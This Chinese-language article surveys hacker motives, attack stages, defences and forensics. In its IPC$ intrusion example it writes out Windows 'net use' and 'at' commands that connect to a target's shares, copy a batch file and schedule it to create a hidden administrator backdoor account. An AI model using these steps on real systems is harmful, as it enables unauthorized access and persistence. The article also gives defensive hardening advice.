淺談黑客的入侵與防范

陳景佩

摘要：黑客是“Hacker”的音譯，源于動詞Hack，在美國麻省理工學(xué)院校園俚語中是“惡作劇”的意思，尤其是那些技術(shù)高明的惡作劇，確實，早期的計算機黑客個個都是編程高手。因此，“黑客”是人們對那些編程高手、迷戀計算機代碼的程序設(shè)計人員的稱謂。真正的黑客有自己獨特的文化和精神，并不破壞其他人的系統(tǒng)，他們崇拜技術(shù)，對計算機系統(tǒng)的最大潛力進(jìn)行智力上的自由探索。

關(guān)鍵詞：Hacker；網(wǎng)絡(luò)；防范1黑客攻擊的動機

隨著時間的變化，黑客攻擊的動機不再像以前那樣簡單了：只是對編程感興趣，或是為了發(fā)現(xiàn)系統(tǒng)漏洞?，F(xiàn)在，黑客攻擊的動機越來越多樣化，主要有以下幾種：⑴貪心。因為貪心而偷竊或者敲詐，有了這種動機，才引發(fā)許多金融案件。⑵惡作劇。計算機程序員搞的一些惡作劇，是黑客的老傳統(tǒng)。⑶名聲。有些人為顯露其計算機經(jīng)驗與才智，以便證明自己的能力，獲得名氣。⑷報復(fù)/宿怨。解雇、受批評或者被降級的雇員，或者其他認(rèn)為自己受到不公正待遇的人，為了報復(fù)而進(jìn)行攻擊。⑸無知/好奇。有些人拿到了一些攻擊工具，因為好奇而使用，以至于破壞了信息還不知道。⑹仇恨。國家和民族原因。⑺間諜。政治和軍事諜報工作。⑻商業(yè)。商業(yè)競爭，商業(yè)間諜。

2網(wǎng)絡(luò)攻擊的步驟

黑客技術(shù)是網(wǎng)絡(luò)安全技術(shù)的一部分，主要是看用這些技術(shù)做什么，用來破壞其他人的系統(tǒng)就是黑客技術(shù)，用于安全維護(hù)就是網(wǎng)絡(luò)安全技術(shù)。學(xué)習(xí)這些技術(shù)就是要對網(wǎng)絡(luò)安全有更深的理解，從更深的層次提高網(wǎng)絡(luò)安全。

進(jìn)行網(wǎng)絡(luò)攻擊并不是件簡單的事情，它是一項復(fù)雜及步驟性很強的工作。一般的攻擊都分為3個階段，即攻擊的準(zhǔn)備階段、攻擊的實施階段、攻擊的善后階段。

攻擊的準(zhǔn)備階段

⑴在攻擊的準(zhǔn)備階段重點做3件事情：確定攻擊目的、收集目標(biāo)信息以及準(zhǔn)備攻擊工具。①確定攻擊目的：首先確定攻擊希望達(dá)到的效果，這樣才能做下一步工作。②收集目標(biāo)信息：在獲取了目標(biāo)主機及其所在網(wǎng)絡(luò)的類型后，還需進(jìn)一步獲取有關(guān)信息，如目標(biāo)主機的IP地址、操作系統(tǒng)的類型和版本、系統(tǒng)管理人員的郵件地址等，根據(jù)這些信息進(jìn)行分析，可以得到被攻擊系統(tǒng)中可能存在的漏洞。③準(zhǔn)備攻擊工具：收集或編寫適當(dāng)?shù)墓ぞ撸⒃诓僮飨到y(tǒng)分析的基礎(chǔ)上，對工具進(jìn)行評估，判斷有哪些漏洞和區(qū)域沒有覆蓋到。

⑵以一個常見的網(wǎng)絡(luò)入侵為例子

IPC$入侵方法

1)IPC$連接的建立與斷開

①建立IPC$連接。假設(shè)192.168.1.104主機的用戶名為abc，密碼為123456，則輸入以下命令。

net use \192.168.1.104IPC$ "123456"/user: "abc"

若要建立空連接，則輸入以下命令。

net use \192.168.1.104IPC$ ""/user: ""

②建立網(wǎng)絡(luò)驅(qū)動器，輸入以下命令。

net use z: \192.168.1.104C$

若要刪除網(wǎng)絡(luò)驅(qū)動器，輸入以下命令。

net use z: /delete

③斷開IPC$連接。輸入以下命令。

net use \192.168.1.104IPC$ /delete

2)建立后門賬號

①編寫批處理文件。在“記事本”中輸入“net user sysback 123456 /add”和“net localgroup administrators sysback /add”命令，另存為hack.bat文件。②與目標(biāo)主機建立IPC$連接。③復(fù)制文件到目標(biāo)主機。輸入“copy hack.bat \192.168.1.104C$”命令，把hack.bat文件復(fù)制到目標(biāo)主機的C盤中。④通過計劃任務(wù)使遠(yuǎn)程主機執(zhí)行hack.bat文件，輸入“net time \192.168.1.104”命令，查看目標(biāo)系統(tǒng)時間。⑤假設(shè)目標(biāo)系統(tǒng)的時間為22:30，則可輸入“at \192.168.1.104 22:35 c:hack.bat”命令，計劃任務(wù)添加完畢后，使用“net use * /delete”命令，斷開IPC$連接。⑥驗證賬號是否成功建立。等一段時間后，估計遠(yuǎn)程主機已經(jīng)執(zhí)行了hack.bat文件。通過sysback賬號建立IPC$連接。若連接成功，說明sysback后門賬號已經(jīng)成功建立。

3網(wǎng)絡(luò)攻擊的防范策略,以IPC$入侵的防范為例：

IPC$在為管理員提供了方便的同時，也留下了嚴(yán)重的安全隱患，防范IPC$入侵的方法有以下3種。

①刪除默認(rèn)共享。②禁止利用空連接進(jìn)行用戶名枚舉攻擊。在注冊表中，把HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa中的restrictanonymous子鍵的值改為1。修改完畢后重新啟動計算機，這樣便禁止了利用空連接進(jìn)行用戶名枚舉攻擊(nbtstat–a IP)。不過要說明的是，這種方法并不能禁止建立空連接。③關(guān)閉Server服務(wù)。Server服務(wù)是IPC$和默認(rèn)共享所依賴的服務(wù)，如果關(guān)閉Server服務(wù)，IPC$和默認(rèn)共享便不存在，但同時服務(wù)器也喪失了其他一些服務(wù)，因此該方法只適合個人計算機使用。④屏蔽139、445端口。沒有這兩個端口的支持，是無法建立IPC$連接的，因此屏蔽139、445端口同樣可以阻止IPC$入侵。

4網(wǎng)絡(luò)入侵證據(jù)的收集與分析

從事網(wǎng)絡(luò)安全工作的人都知道，黑客在入侵之后都會想方設(shè)法抹去自己在受害系統(tǒng)上的活動記錄，目的是逃脫法律的制裁。而許多企業(yè)也不上報網(wǎng)絡(luò)犯罪，其原因在于害怕這樣做會對業(yè)務(wù)運作或企業(yè)商譽造成負(fù)面影響，他們擔(dān)心這樣做會讓業(yè)務(wù)運作因此失序，更重要的是收集犯罪證據(jù)有一定困難。因此，CIO(Chief Information Office，首席信息官)們應(yīng)該在應(yīng)急響應(yīng)系統(tǒng)的建立中加入計算機犯罪證據(jù)的收集與分析環(huán)節(jié)。

計算機取證又稱為數(shù)字取證或電子取證，是指對計算機入侵、破壞、欺詐、攻擊等犯罪行為利用計算機軟硬件技術(shù)，按照符合法律規(guī)范的方式進(jìn)行證據(jù)獲取、保存、分析和出示的過程。從技術(shù)上，計算機取證是一個對受侵計算機系統(tǒng)進(jìn)行掃描和破解，以及對整個入侵事件進(jìn)行重建的過程。

4.1 計算機取證包括物理證據(jù)獲取和信息發(fā)現(xiàn)兩個階段

物理證據(jù)獲取是指調(diào)查人員到計算機犯罪或入侵的現(xiàn)場，尋找并扣留相關(guān)的計算機硬件；信息發(fā)現(xiàn)是指從原始數(shù)據(jù)(包括文件，日志等)中尋找可以用來證明或者反駁的證據(jù)，即電子證據(jù)。除了那些剛?cè)腴T的“毛小子”之外，計算機犯罪分子也會在作案前周密部署、作案后消除蛛絲馬跡。他們更改、刪除目標(biāo)主機中的日志文件，清理自己的工具軟件，或利用反取證工具來破壞偵察人員的取證。

4.2 物理取證是核心任務(wù)

在任何情況下，調(diào)查者都應(yīng)牢記以下5點：(1)不要改變原始記錄。(2)不要在作為證據(jù)的計算機上執(zhí)行無關(guān)的操作。(3)不要給犯罪者銷毀證據(jù)的機會。(4)詳細(xì)記錄所有的取證活動。(5)妥善保存得到的物證。

[參考文獻(xiàn)]

[1]陳忠平.《網(wǎng)絡(luò)安全》.清華大學(xué)出版社,2011年.

[2]（美）格里格瑞斯,等,著.《網(wǎng)絡(luò)安全：現(xiàn)狀與展望》.科學(xué)出版社, 2010年.

[3]王淑江.《超級網(wǎng)管員網(wǎng)絡(luò)安全》.機械工業(yè)出版社,2011年.